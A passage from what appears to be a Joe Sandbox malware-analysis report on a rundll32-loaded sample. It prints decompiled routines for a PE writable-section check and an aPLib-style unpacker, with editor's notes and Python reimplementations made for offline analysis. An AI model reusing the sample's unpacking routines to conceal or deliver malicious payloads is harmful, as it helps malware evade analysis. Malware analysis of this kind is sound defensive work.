                0x04b93d80
                0x04b93d83
                0x04b93d95
                0x04b93d98
                0x04b93daa
                0x04b93dad
                0x04b93db1
                0x04b93dc1
                0x04b93dc4
                0x04b93dd2
                0x04b93dd5
                0x04b93de7
                0x04b93dea
                0x04b93dfe
                0x04b93e01
                0x04b93e03
                0x04b93e13
                0x04b93e16
                0x04b93e28
                0x04b93e2b
                0x04b93e39
                0x04b93e3c
                0x04b93e4e
                0x04b93e51
                0x04b93e55
                0x04b93e65
                0x04b93e68
                0x04b93e7a
                0x04b93e7d
                0x04b93e8b
                0x04b93e8e
                0x04b93ea0
                0x04b93ea3
                0x04b93eb5
                0x04b93eb8
                0x04b93ecc
                0x04b93ecf
                0x04b93ee3
                0x04b93ee6
                0x04b93efa
                0x04b93efd
                0x04b93f11
                0x04b93f14
                0x04b93f28
                0x04b93f2b
                0x04b93f3f
                0x04b93f44
                0x04b93f56
                0x04b93f59
                0x04b93f6d
                0x04b93f70
                0x04b93f84
                0x04b93f87
                0x04b93f9d
                0x04b93fa0
                0x04b93fb4
                0x04b93fb7
                0x04b93fc9
                0x04b93fcc
                0x04b93fe0
                0x04b93fe3
                0x04b93ff7
                0x04b93ffa
                0x04b9400e
                0x04b94017
                0x04b9401a
                0x04b94023
                0x04b9402c
                0x04b94034
                0x04b9403c
                0x04b94046
                0x04b9405b

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 0fa6b20996f5fbee30119e22c93400c1527cb528fe5c5e6e3bcf183407d991ed
                • Instruction ID: ed959bca078ea9fa18b4e2381cf1cd3b3d243472c7a27c2d16a0494a5835ac59
                • Opcode Fuzzy Hash: 0fa6b20996f5fbee30119e22c93400c1527cb528fe5c5e6e3bcf183407d991ed
                • Instruction Fuzzy Hash: B922847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B985F1(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x4b9a380; // 0x0
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x4b9a3c8 = 1;
                										__eflags =  *0x4b9a3c8;
                										if( *0x4b9a3c8 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x4b9a380; // 0x0
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x4b9a3c8 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x4b9a380 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x4b9a388 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x4b9a384 + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x4b9a388 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x4b9a388 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x4b9a3c8 = 1;
                							__eflags =  *0x4b9a3c8;
                							if( *0x4b9a3c8 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x4b9a388 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x4b9a388 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x4b9a3c8 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x4b9a388 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t25 = _t81 - 1; // -1
                							_t58 = _t25;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x4b9a380 = _t81;
                								}
                								_t28 = _t81 - 1; // 0x0
                								_t58 = _t28;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x4b9a388 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x4b9a388 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}

                (instruction address column for the listing above, 0x04b985fb to 0x04b9880e; per-line alignment with the C code was lost in extraction)

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04B986A2
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 9529fc129334043760c1193efc921505f5e510153446b8771e56fb3231083c44
                • Instruction ID: 49bbad17ebf2a9d6c0abec367f9f98aa87a787ca901112ac155602f98c87a51c
                • Opcode Fuzzy Hash: 9529fc129334043760c1193efc921505f5e510153446b8771e56fb3231083c44
                • Instruction Fuzzy Hash: FB6192316246429BDF29EF29C59066973E2FB87398B2489F9D846CF290E735FC41C650
                Uniqueness

                Uniqueness Score: -1.00%
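
                Editor's note on the routine above. The fragment calls NtQueryVirtualMemory with information class 0 (MemoryBasicInformation) and a 0x1C-byte buffer, which is sizeof(MEMORY_BASIC_INFORMATION) for a 32-bit process, and then validates a PE image at the base held in _v32: 'MZ' (0x5a4d) at offset 0, 'PE' (0x4550) at e_lfanew (offset 0x3c), optional-header magic 0x10b (PE32 only) at nt+0x18, and NumberOfSections (nt+6) greater than zero. It locates the section table at nt+0x18+SizeOfOptionalHeader (nt+0x14), computes the RVA of the address in _t76 relative to that base, and compares it against VirtualAddress (+0xc) and VirtualSize (+8) of a section header; when the RVA falls inside, it tests bit 0x80 of the byte at +0x27, the top byte of Characteristics, i.e. IMAGE_SCN_MEM_WRITE, and branches to L20 only for a writable section. The values it looks up are also cached in a small table (count at 0x4b9a380, at most 0x10 entries at 0x4b9a388) that is searched and reordered on each hit.

                The following Python is an added example by the editor, not code from the sample or from Joe Sandbox. It reimplements the same header checks and section lookup over a file image so an analyst can reproduce the test offline. The fragment shows the comparison for one section header; this example walks the whole table (an assumption about the loop the excerpt cuts off at L46). The PE header it runs against is constructed in build_test_headers() and is not taken from Zeip.dll.

```python
import struct

# Constants checked by the decompiled routine (offsets follow the PE header layout)
IMAGE_DOS_SIGNATURE = 0x5A4D            # "MZ", word at image+0
IMAGE_NT_SIGNATURE = 0x4550             # "PE\0\0", dword at image+e_lfanew
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B   # word at nt+0x18: PE32 only
IMAGE_SCN_MEM_WRITE = 0x80000000        # bit 0x80 of byte +0x27 in the section header
IMAGE_SIZEOF_SECTION_HEADER = 0x28


def find_section(image: bytes, rva: int):
    """Return (name, characteristics) of the section whose virtual range
    contains rva, or None if the headers fail the checks the routine makes."""
    if len(image) < 0x40 or struct.unpack_from("<H", image, 0)[0] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew + 0x1A > len(image):
        return None
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        return None
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]      # nt+6
    size_opt = struct.unpack_from("<H", image, e_lfanew + 0x14)[0]       # nt+0x14
    magic = struct.unpack_from("<H", image, e_lfanew + 0x18)[0]          # nt+0x18
    if magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC or num_sections == 0:
        return None
    table = e_lfanew + 0x18 + size_opt    # first IMAGE_SECTION_HEADER (_t89 in the listing)
    for i in range(num_sections):
        off = table + i * IMAGE_SIZEOF_SECTION_HEADER
        if off + IMAGE_SIZEOF_SECTION_HEADER > len(image):
            return None
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", image, off + 8)          # +8, +0xC
        chars = struct.unpack_from("<I", image, off + 0x24)[0]            # +0x24
        if vaddr <= rva < vaddr + vsize:
            return name, chars
    return None


def rva_in_writable_section(image: bytes, rva: int) -> bool:
    """True when rva lies in a section with IMAGE_SCN_MEM_WRITE set, the
    condition that sends the decompiled routine to L20 instead of L46."""
    hit = find_section(image, rva)
    return hit is not None and bool(hit[1] & IMAGE_SCN_MEM_WRITE)


def build_test_headers() -> bytes:
    """Constructed (not from the sample) minimal PE32 header with two sections:
    .text at RVA 0x1000 (read/execute) and .data at RVA 0x2000 (read/write)."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    # Signature, Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<IHHIIIHH", IMAGE_NT_SIGNATURE, 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)

    def section(name, vsize, vaddr, chars):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)

    text = section(b".text", 0x1000, 0x1000, 0x60000020)   # CODE | EXECUTE | READ
    data = section(b".data", 0x800, 0x2000, 0xC0000040)    # INITIALIZED_DATA | READ | WRITE
    return bytes(dos) + file_hdr + bytes(opt) + text + data


if __name__ == "__main__":
    img = build_test_headers()
    for rva in (0x1010, 0x2100, 0x3000):
        print(hex(rva), find_section(img, rva), rva_in_writable_section(img, rva))
```

                To apply it to a real image, read the file (or the dumped region from the .sdmp) into memory and pass the RVA of the address of interest; a PE32+ image (magic 0x20b) is rejected, exactly as the sample's check rejects it.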

                C-Code - Quality: 93%
                			E00401E2A(intOrPtr* __eax, char* _a4) {
                				unsigned int _v12;
                				unsigned int _v16;
                				char* _v20;
                				signed int _v24;
                				char _v32;
                				signed char* _v40;
                				signed int _t185;
                				signed int _t195;
                				intOrPtr* _t197;
                				intOrPtr* _t208;
                				void* _t220;
                				intOrPtr* _t222;
                				char* _t227;
                				void* _t234;
                				char* _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t244;
                				signed int _t246;
                				signed int _t248;
                				signed int _t252;
                				signed int _t254;
                				char _t256;
                				signed int _t257;
                				signed int _t259;
                				char _t261;
                				signed int _t262;
                				char _t266;
                				signed int _t267;
                				signed int _t270;
                				signed int _t272;
                				unsigned int _t273;
                				signed int _t275;
                				void* _t276;
                				void* _t277;
                				signed int _t279;
                				signed int _t280;
                				unsigned int _t282;
                				unsigned int _t283;
                				void* _t284;
                
                				_t237 = _a4;
                				_t270 = 0;
                				_t277 = 0;
                				 *_t237 =  *((intOrPtr*)(__eax));
                				_t234 = 8;
                				_v20 = _t237 + 1;
                				_v12 = 0;
                				_v32 = 0;
                				_v16 = 0;
                				_v40 = __eax + 1;
                				_t7 = _t234 + 0x78; // 0x80
                				_t239 = _t7;
                				do {
                					_t8 =  &_v32;
                					 *_t8 = _v32 - 1;
                					asm("bt dword [eax], 0x1f");
                					if( *_t8 >= 0) {
                						_t241 = _v24;
                					} else {
                						_v40 =  &(_v40[1]);
                						_t241 =  *_v40 & 0x000000ff;
                						_v32 = _v32 + _t234;
                					}
                					_v24 = _t241 + _t241;
                					if((_t241 & _t239 & 0xffffff80) == 0) {
                						_v20 = _v20 + 1;
                						_v40 =  &(_v40[1]);
                						 *_v20 =  *_v40;
                						goto L74;
                					} else {
                						_t20 =  &_v32;
                						 *_t20 = _v32 - 1;
                						asm("bt dword [eax], 0x1f");
                						if( *_t20 >= 0) {
                							_t244 = _v24;
                						} else {
                							_v40 =  &(_v40[1]);
                							_t244 =  *_v40 & 0x000000ff;
                							_v32 = _v32 + _t234;
                						}
                						_v24 = _t244 + _t244;
                						if((_t244 & _t239 & 0xffffff80) == 0) {
                							_t272 = 1;
                							do {
                								_t69 =  &_v32;
                								 *_t69 = _v32 - 1;
                								asm("bt dword [eax], 0x1f");
                								if( *_t69 >= 0) {
                									_t246 = _v24;
                								} else {
                									_v40 =  &(_v40[1]);
                									_t246 =  *_v40 & 0x000000ff;
                									_v32 = _v32 + _t234;
                								}
                								_t78 =  &_v32;
                								 *_t78 = _v32 - 1;
                								_t272 = ((_t246 & _t239) >> 7) + _t272 * 2;
                								_v24 = _t246 + _t246;
                								asm("bt dword [eax], 0x1f");
                								if( *_t78 >= 0) {
                									_t248 = _v24;
                								} else {
                									_v40 =  &(_v40[1]);
                									_t248 =  *_v40 & 0x000000ff;
                									_v32 = _v32 + _t234;
                								}
                								_v24 = _t248 + _t248;
                							} while ((_t248 & _t239 & 0xffffff80) != 0);
                							if(_t277 != 0) {
                								_t123 = _t272 - 2; // -1
                								_t185 = _t123;
                								goto L53;
                							} else {
                								if(_t272 != 2) {
                									_t122 = _t272 - 3; // -2
                									_t185 = _t122;
                									L53:
                									_v40 =  &(_v40[1]);
                									_t273 = (_t185 << 8) + ( *_v40 & 0x000000ff);
                									_t279 = 1;
                									do {
                										_t127 =  &_v32;
                										 *_t127 = _v32 - 1;
                										asm("bt dword [eax], 0x1f");
                										if( *_t127 >= 0) {
                											_t252 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t252 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_t136 =  &_v32;
                										 *_t136 = _v32 - 1;
                										_t279 = ((_t252 & _t239) >> 7) + _t279 * 2;
                										_v24 = _t252 + _t252;
                										asm("bt dword [eax], 0x1f");
                										if( *_t136 >= 0) {
                											_t254 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t254 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_v24 = _t254 + _t254;
                									} while ((_t254 & _t239 & 0xffffff80) != 0);
                									_t195 = _t279;
                									if(_t273 < _t239) {
                										_t151 = _t279 + 2; // 0x3
                										_t195 = _t151;
                									}
                									if(_t273 >= 0x7d00) {
                										_t195 = _t195 + 1;
                									}
                									if(_t273 >= 0x500) {
                										_t195 = _t195 + 1;
                									}
                									_t280 = _t195;
                									if(_t195 != 0) {
                										_t197 = _v20 - _t273;
                										do {
                											_t256 =  *_t197;
                											_v20 = _v20 + 1;
                											_t197 = _t197 + 1;
                											_t280 = _t280 - 1;
                											 *_v20 = _t256;
                										} while (_t280 != 0);
                										_t234 = 8;
                									}
                									_v12 = _t273;
                								} else {
                									_t275 = 1;
                									do {
                										_t93 =  &_v32;
                										 *_t93 = _v32 - 1;
                										asm("bt dword [eax], 0x1f");
                										if( *_t93 >= 0) {
                											_t257 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t257 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_t102 =  &_v32;
                										 *_t102 = _v32 - 1;
                										_t275 = ((_t257 & _t239) >> 7) + _t275 * 2;
                										_v24 = _t257 + _t257;
                										asm("bt dword [eax], 0x1f");
                										if( *_t102 >= 0) {
                											_t259 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t259 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_v24 = _t259 + _t259;
                									} while ((_t259 & _t239 & 0xffffff80) != 0);
                									if(_t275 != 0) {
                										_t208 = _v20 - _v12;
                										do {
                											_t261 =  *_t208;
                											_v20 = _v20 + 1;
                											_t208 = _t208 + 1;
                											_t275 = _t275 - 1;
                											 *_v20 = _t261;
                										} while (_t275 != 0);
                									}
                								}
                							}
                							goto L72;
                						} else {
                							_t32 =  &_v32;
                							 *_t32 = _v32 - 1;
                							asm("bt dword [eax], 0x1f");
                							if( *_t32 >= 0) {
                								_t262 = _v24;
                							} else {
                								_v40 =  &(_v40[1]);
                								_t262 =  *_v40 & 0x000000ff;
                								_v32 = _v32 + _t234;
                							}
                							_v24 = _t262 + _t262;
                							if((_t262 & _t239 & 0xffffff80) == 0) {
                								_t282 =  *_v40 & 0x000000ff;
                								_v40 =  &(_v40[1]);
                								_t220 = (_t282 & 1) + 2;
                								_t283 = _t282 >> 1;
                								if(_t283 == 0) {
                									_v16 = 1;
                								} else {
                									_t276 = _t220;
                									if(_t220 != 0) {
                										_t222 = _v20 - _t283;
                										do {
                											_t266 =  *_t222;
                											_v20 = _v20 + 1;
                											_t222 = _t222 + 1;
                											_t276 = _t276 - 1;
                											 *_v20 = _t266;
                										} while (_t276 != 0);
                										_t234 = 8;
                									}
                								}
                								_v12 = _t283;
                								L72:
                								_t277 = 1;
                							} else {
                								_t284 = 4;
                								do {
                									_t44 =  &_v32;
                									 *_t44 = _v32 - 1;
                									asm("bt dword [eax], 0x1f");
                									if( *_t44 >= 0) {
                										_t267 = _v24;
                									} else {
                										_v40 =  &(_v40[1]);
                										_t267 =  *_v40 & 0x000000ff;
                										_v32 = _v32 + _t234;
                									}
                									_t284 = _t284 - 1;
                									_v24 = _t267 + _t267;
                									_t270 = ((_t267 & _t239) >> 7) + _t270 * 2;
                								} while (_t284 != 0);
                								_t227 = _v20;
                								if(_t270 == 0) {
                									 *_t227 = 0;
                								} else {
                									 *_v20 =  *((intOrPtr*)(_t227 - _t270));
                								}
                								_v20 = _v20 + 1;
                								L74:
                								_t277 = 0;
                							}
                						}
                					}
                					_t270 = 0;
                				} while (_v16 == 0);
                				return _v20 - _a4;
                			}

                (instruction address column for the listing above, 0x00401e32 to 0x00402132; per-line alignment with the C code was lost in extraction)

                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction ID: 0989effe67a0bb300d0aa8b8e4c5787125b32bb8dafe6a19f9c287dcd43717e7
                • Opcode Fuzzy Hash: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction Fuzzy Hash: 24C14B31D0425A8FCB05CF99C9805FEB7F1EF8A310B1481A7D961BB291C6799E02DFA4
                Uniqueness

                Uniqueness Score: -1.00%
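
                Editor's note on E00401E2A. The routine is an LZ77-style decompressor driven by a tag byte: _v40 is the source pointer, _v24 the current tag byte (shifted left one bit per read), _v32 the remaining-bit counter (refilled from the next source byte when it goes negative), _v20 the output pointer, _v12 the offset of the last match, _t277 a "last block was a match" flag, and _v16 the done flag. The first byte is copied verbatim, a 0 bit introduces a literal, "10" introduces a gamma-coded offset and length with the length adjustments visible at 0x80 (+2), 0x7d00 (+1) and 0x500 (+1), "110" reads one byte holding offset << 1 | (length - 2) where offset 0 ends the stream, and "111" reads a 4-bit offset for a single byte (offset 0 writes a zero). That layout and those exact constants are aPLib's depack routine; the identification is the editor's, from the constants, as nothing on the page names the format. The same routine appears again below as E04B92FED in the 0x04B90000 region of rundll32. One caveat: the listing is not consistent about whether _v40 and _v20 are advanced before or after the access (compare the literal path with the short-match path), so take byte order from the format rather than from the listing.

                The following Python is an added example by the editor, not code from the sample, Joe Sandbox or the aPLib project. It implements the decoder described above with the same refill, gamma and length rules, plus an output bound and offset checks that the original lacks (a hostile stream can request arbitrarily long back-references). The input in SAMPLE_STREAM is hand-encoded for this example and is not taken from Zeip.dll.

```python
class _BitReader:
    """Tag-byte bit reader with the refill rule of the decompiled routine:
    the bit counter (_v32) is decremented and, when exhausted, a new tag
    byte (_v24) is fetched from the source pointer (_v40)."""

    def __init__(self, data: bytes, pos: int):
        self.data, self.pos = data, pos      # pos: next byte to consume
        self.tag, self.bitcount = 0, 0

    def getbyte(self) -> int:
        if self.pos >= len(self.data):
            raise ValueError("truncated stream")
        b = self.data[self.pos]
        self.pos += 1
        return b

    def getbit(self) -> int:
        if self.bitcount == 0:
            self.tag, self.bitcount = self.getbyte(), 8
        self.bitcount -= 1
        bit = (self.tag >> 7) & 1            # (_t & 0x80) >> 7
        self.tag = (self.tag << 1) & 0xFF    # _v24 = _t + _t
        return bit

    def getgamma(self) -> int:
        # result starts at 1; each round shifts in a data bit, then reads a
        # continuation bit (1 = more): the do/while loops on _t272/_t279/_t275
        result = 1
        while True:
            result = (result << 1) + self.getbit()
            if not self.getbit():
                return result


def aplib_depack(src: bytes, max_out: int = 1 << 24) -> bytes:
    """Decode an aPLib stream; raises ValueError on truncated or malformed input."""
    out = bytearray(src[:1])                 # first byte is stored verbatim
    r = _BitReader(src, 1)
    last_offs = 0                            # _v12: offset of the last match
    last_was_match = False                   # _t277
    while True:
        if len(out) > max_out:
            raise ValueError("output limit exceeded")
        if not r.getbit():                               # 0: literal byte
            out.append(r.getbyte())
            last_was_match = False
        elif not r.getbit():                             # 10: gamma-coded match
            offs = r.getgamma()
            if not last_was_match and offs == 2:         # reuse previous offset
                length = r.getgamma()
                offs = last_offs
            else:
                offs -= 2 if last_was_match else 3
                offs = (offs << 8) + r.getbyte()
                length = r.getgamma()
                if offs < 0x80:                          # _t273 < _t239
                    length += 2
                if offs >= 0x7D00:
                    length += 1
                if offs >= 0x500:
                    length += 1
            if offs <= 0 or offs > len(out):
                raise ValueError("bad match offset")
            for _ in range(length):
                out.append(out[-offs])
            last_offs, last_was_match = offs, True
        elif not r.getbit():                             # 110: one-byte short match
            b = r.getbyte()
            length, offs = 2 + (b & 1), b >> 1
            if offs == 0:                                # end-of-stream marker (_v16 = 1)
                break
            if offs > len(out):
                raise ValueError("bad match offset")
            for _ in range(length):
                out.append(out[-offs])
            last_offs, last_was_match = offs, True
        else:                                            # 111: 4-bit offset, one byte
            offs = 0
            for _ in range(4):
                offs = (offs << 1) + r.getbit()
            if offs > len(out):
                raise ValueError("bad match offset")
            out.append(out[-offs] if offs else 0)        # offset 0 writes a zero byte
            last_was_match = False
    return bytes(out)


def safe_depack(src: bytes):
    """Wrapper returning None instead of raising on malformed input."""
    try:
        return aplib_depack(src)
    except ValueError:
        return None


# Constructed stream (hand-encoded for this example): 'A' verbatim; literals B, C;
# gamma match offset 3 length 6; literal D; 4-bit offset 1; repeat-offset match
# length 2; short match offset 2 length 3; end marker. Decodes to ABCABCABCDDCDCDC.
SAMPLE_STREAM = bytes([0x41, 0x29, 0x42, 0x43, 0x03, 0x1C, 0x44, 0x60, 0xD8, 0x05, 0x00])

if __name__ == "__main__":
    print(aplib_depack(SAMPLE_STREAM))
```

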